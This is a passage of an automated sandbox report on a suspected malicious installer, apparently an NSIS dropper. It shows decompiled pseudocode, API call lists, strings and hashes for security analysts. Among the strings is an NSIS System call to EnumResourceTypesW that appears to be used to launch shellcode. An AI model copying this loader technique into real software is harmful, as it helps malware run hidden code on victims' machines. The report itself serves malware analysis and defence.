Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 4168f7cda2461ab29a413577240e25eb98403622908524b228d767f220b0f951
Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
Opcode Fuzzy Hash: 4168f7cda2461ab29a413577240e25eb98403622908524b228d767f220b0f951
Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404771 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404771(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422700;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040593B(0x3fb, _t146);
					E004064A6(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040593B(0x3fb, _t146);
							if(E00405CCE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406212(0x4216f8, _t146);
							_t87 = E004065EC(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406212(0x4216f8, _t146);
								_t89 = E00405C71(0x4216f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C12(0x4216f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404C0E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
									E00404BF6(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216e8);
									} else {
										E00404B2D(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004042F8(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423718 == _t158) {
									E00404706();
								}
								 *0x423718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423728;
							_v60 = E00404AC7;
							_v56 = _t146;
							_v68 = E00406234(_t146, 0x423728, _t167, 0x421f00, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a250 + 0x11c));
								if( *((intOrPtr*)( *0x42a250 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93") {
									E00406234(_t146, 0x423728, _t167, 0, _t125);
									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
										lstrcatW(_t146, 0x4281e0);
									}
								}
								 *0x423718 =  *0x423718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405C3D(_t146) != 0 && E00405C71(_t146) == 0) {
						E00405BC6(_t146);
					}
					 *0x429218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D6(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D6(_t167);
					E0040430B(_t166);
					_t138 = E004065EC(6);
					if(_t138 == 0) {
						L53:
						return E0040433D(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404771
0x00404777
0x0040477d
0x0040478a
0x00404798
0x0040479b
0x004047a3
0x004047a9
0x004047a9
0x004047b5
0x004047b8
0x00404826
0x0040482d
0x00404904
0x0040490b
0x0040491a
0x0040491a
0x0040491e
0x00404928
0x00404935
0x00404937
0x00404937
0x00404945
0x0040494c
0x00404953
0x00404956
0x00404992
0x00404994
0x0040499a
0x0040499f
0x004049a3
0x004049a5
0x004049a5
0x004049c1
0x00000000
0x004049c3
0x004049c6
0x004049d4
0x004049da
0x004049db
0x004049de
0x004049e1
0x00000000
0x004049e1
0x00404958
0x0040495a
0x0040495e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404960
0x00404960
0x0040496d
0x00404972
0x00000000
0x00000000
0x00404976
0x00404978
0x00404978
0x00404981
0x00404983
0x00404988
0x0040498b
0x00404990
0x00000000
0x00000000
0x00000000
0x00000000
0x00404990
0x004049ed
0x004049f7
0x004049fa
0x004049fd
0x00404a04
0x00404a04
0x00404a06
0x00404a06
0x00404a0b
0x00404a0d
0x00404a15
0x00404a1c
0x00404a1e
0x00404a29
0x00404a29
0x00404a1e
0x00404a39
0x00404a43
0x00404a4b
0x00404a66
0x00404a4d
0x00404a56
0x00404a56
0x00404a4b
0x00404a6b
0x00404a70
0x00404a75
0x00404a7e
0x00404a7e
0x00404a87
0x00404a89
0x00404a89
0x00404a95
0x00404a9d
0x00404aa7
0x00404aa7
0x00404aac
0x00000000
0x00404aac
0x00404956
0x0040490d
0x00404914
0x00000000
0x00000000
0x00000000
0x00404914
0x00404833
0x0040483c
0x00404856
0x0040485b
0x00404865
0x0040486c
0x00404878
0x0040487b
0x0040487e
0x00404885
0x0040488d
0x00404890
0x00404894
0x0040489b
0x004048a3
0x004048fd
0x004048a5
0x004048a6
0x004048ad
0x004048b7
0x004048bf
0x004048cc
0x004048e0
0x004048e4
0x004048e4
0x004048e0
0x004048e9
0x004048f6
0x004048f6
0x004048a3
0x00000000
0x0040485b
0x00404849
0x00000000
0x00000000
0x0040484f
0x00000000
0x004047ba
0x004047c7
0x004047d0
0x004047dd
0x004047dd
0x004047e4
0x004047ea
0x004047f3
0x004047f6
0x004047f9
0x00404801
0x00404804
0x00404807
0x0040480d
0x00404814
0x0040481b
0x00404ab2
0x00404ac4
0x00404821
0x00404824
0x00000000
0x00404824
0x0040481b

APIs

GetDlgItem.USER32(?,000003FB), ref: 004047C0
SetWindowTextW.USER32 ref: 004047EA
SHBrowseForFolderW.SHELL32(?), ref: 0040489B
CoTaskMemFree.OLE32(00000000), ref: 004048A6
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004048D8
lstrcatW.KERNEL32 ref: 004048E4
SetDlgItemTextW.USER32 ref: 004048F6

Part of subcall function 0040593B: GetDlgItemTextW.USER32 ref: 0040594E

Part of subcall function 004064A6: CharNextW.USER32(?), ref: 00406509
Part of subcall function 004064A6: CharNextW.USER32(?), ref: 00406518
Part of subcall function 004064A6: CharNextW.USER32(?), ref: 0040651D
Part of subcall function 004064A6: CharPrevW.USER32(?,?), ref: 00406530

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
MulDiv.KERNEL32 ref: 004049D4

Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
Part of subcall function 00404B2D: SetDlgItemTextW.USER32 ref: 00404BEA

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93, xrefs: 004048C1
(7B, xrefs: 0040486E
Call, xrefs: 004048D2, 004048D7, 004048E2
kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 0040478A
A, xrefs: 00404894

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
API String ID: 2624150263-3883459150
Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402104() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x50)) = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x38)) = E00402C53(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C53(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C53(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C53(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405C3D( *((intOrPtr*)(_t107 - 0x38))) == 0) {
					E00402C53(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x38)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x50)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x0040210d
0x00402117
0x00402121
0x0040212b
0x00402136
0x00402139
0x00402153
0x00402156
0x0040215c
0x0040215f
0x00402169
0x0040216d
0x0040216d
0x00402172
0x00402183
0x0040218b
0x00402242
0x00402242
0x00402249
0x00402191
0x00402191
0x004021a0
0x004021a4
0x004021a7
0x004021ad
0x004021bb
0x004021be
0x004021c0
0x004021cb
0x004021cb
0x004021d0
0x004021d2
0x004021d9
0x004021d9
0x004021dc
0x004021e5
0x004021e8
0x004021ee
0x004021f0
0x004021fa
0x004021fa
0x004021fd
0x00402206
0x00402209
0x00402212
0x00402218
0x0040221a
0x00402228
0x00402228
0x0040222b
0x00402231
0x00402231
0x00402234
0x0040223a
0x00402240
0x00402255
0x00000000
0x00000000
0x00000000
0x00402240
0x0040224b
0x00402ade
0x00402aea

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 004021C3

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
API String ID: 542301482-910239263
Opcode ID: 1f3fbbfb6b0ee92c2e95c354eda2b83ee9640ec022ed1a25e088aabce2a4beb5
Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
Opcode Fuzzy Hash: 1f3fbbfb6b0ee92c2e95c354eda2b83ee9640ec022ed1a25e088aabce2a4beb5
Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040287E(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C53(2), _t21 - 0x2b8) != 0xffffffff) {
					E00406159( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x28c);
					_push(__esi);
					E00406212();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402896
0x004028b1
0x004028bc
0x004028bd
0x004029f7
0x00402898
0x0040289b
0x0040289e
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040288D

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f0571f4bbbdcd8fa4134a8b5f0c6d2c473a1f5fbcdf1fbb2f68873db9ea6aa96
Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
Opcode Fuzzy Hash: f0571f4bbbdcd8fa4134a8b5f0c6d2c473a1f5fbcdf1fbb2f68873db9ea6aa96
Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404473 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404473(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				short* _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216f4 =  *0x4216f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040433D(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281e0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v8, 0, 0, 1);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a248, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422700 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F8(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404706();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42921c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a278 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404424;
				if(_t110 != 2) {
					_v8 = E004043EA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004042D6(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004042D6(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F8( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040430B(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a250 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216f4 = 0;
				return 0;
			}

0x00404485
0x004045b2
0x0040460f
0x00404613
0x004046e8
0x004046ea
0x004046ea
0x004046f0
0x004046f0
0x004046f3
0x00000000
0x004046fa
0x00404621
0x00404627
0x00404631
0x0040463c
0x0040463f
0x00404642
0x0040464d
0x00404650
0x00404657
0x00404664
0x00404675
0x0040468a
0x00404699
0x0040469f
0x0040469f
0x00404657
0x004046a9
0x00000000
0x004046b4
0x004046b8
0x004046c8
0x004046c8
0x004046ce
0x004046da
0x004046da
0x00000000
0x004046de
0x004046a9
0x004045bd
0x00000000
0x004045cf
0x004045d4
0x004045da
0x00000000
0x00000000
0x00404603
0x00404605
0x0040460a
0x00000000
0x0040460a
0x004045bd
0x0040448b
0x0040448e
0x00404493
0x004044a4
0x004044a4
0x004044ac
0x004044af
0x004044b3
0x004044b6
0x004044ba
0x004044bd
0x004044c0
0x004044c3
0x004044ca
0x004044cc
0x004044cc
0x004044d6
0x004044e3
0x004044ed
0x004044f2
0x004044f5
0x004044fa
0x00404511
0x00404518
0x0040452b
0x0040452e
0x00404542
0x00404549
0x0040454e
0x00404553
0x00404553
0x00404561
0x0040456f
0x00404581
0x00404586
0x00404596
0x00404598
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
GetDlgItem.USER32(?,000003E8), ref: 00404525
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
GetSysColor.USER32 ref: 00404553
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
lstrlenW.KERNEL32(?), ref: 00404574
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
GetDlgItem.USER32(?,0000040A), ref: 004045EF
SendMessageW.USER32(00000000), ref: 004045F6
GetDlgItem.USER32(?,000003E8), ref: 00404621
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
LoadCursorW.USER32 ref: 00404672
SetCursor.USER32(00000000), ref: 00404675
ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
LoadCursorW.USER32 ref: 00404696
SetCursor.USER32(00000000), ref: 00404699
SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA

Strings

N, xrefs: 0040460F
Call, xrefs: 00404650
open, xrefs: 00404682
C@, xrefs: 0040467F

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
